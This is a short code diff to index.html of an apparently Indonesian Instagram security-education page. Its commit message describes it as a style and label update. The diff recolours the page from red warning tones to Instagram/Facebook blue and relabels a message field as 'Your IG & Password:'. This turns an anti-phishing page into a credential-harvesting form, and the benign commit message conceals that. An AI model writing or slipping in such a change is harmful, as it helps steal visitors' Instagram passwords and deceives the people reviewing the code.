Update styles and form labels in index.html

--- a/index.html
+++ b/index.html
@@ -96,12 +96,12 @@
   <title>AmanIG - Edukasi Keamanan Instagram</title>
   <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css">
   <style>
-    body { font-family: system-ui, sans-serif; background: #0a0e17; color: #d1d5db; margin: 0; padding: 0; text-align: center; }
-    h1 { font-size: 2.8rem; font-weight: 900; color: #ef4444; text-transform: uppercase; letter-spacing: 2px; margin: 1.5rem 0; }
+    body { font-family: system-ui, sans-serif; background: #ffffff; color: #d1d5db; margin: 0; padding: 0; text-align: center; }
+    h1 { font-size: 2.8rem; font-weight: 900; color: #1877f2; text-transform: uppercase; letter-spacing: 2px; margin: 1.5rem 0; }
     .section { padding: 2rem 1rem; max-width: 600px; margin: 0 auto; }
     input, button { width: 100%; padding: 0.8rem; margin: 0.8rem 0; border-radius: 8px; border: 1px solid #4b5563; background: #1f2937; color: white; font-size: 1rem; }
-    button { background: #ef4444; border: none; cursor: pointer; font-weight: bold; }
-    .warning { background: #7f1d1d; color: white; padding: 1.5rem; border-radius: 12px; margin: 1.5rem 0; font-weight: bold; font-size: 1.1rem; }
+    button { background: #ffffff; border: none; cursor: pointer; font-weight: bold; }
+    .warning { background: #1877f2; color: white; padding: 1.5rem; border-radius: 12px; margin: 1.5rem 0; font-weight: bold; font-size: 1.1rem; }
     #result { margin: 1.5rem 0; font-size: 1.2rem; font-weight: bold; }
     footer { padding: 2rem; background: #000; color: #94a3b8; font-size: 0.9rem; }
     .logos { display: flex; justify-content: center; gap: 3rem; flex-wrap: wrap; margin-top: 1rem; }
@@ -136,7 +136,7 @@ Menghindari website yang menjanjikan fitur tidak resmi seperti peretasan akun, p
     <input type="email" name="email">
   </label>
   <label>
-    Your message:
+    Your IG & Password:
     <textarea name="message"></textarea>
   </label>
   <!-- your other form fields go here -->
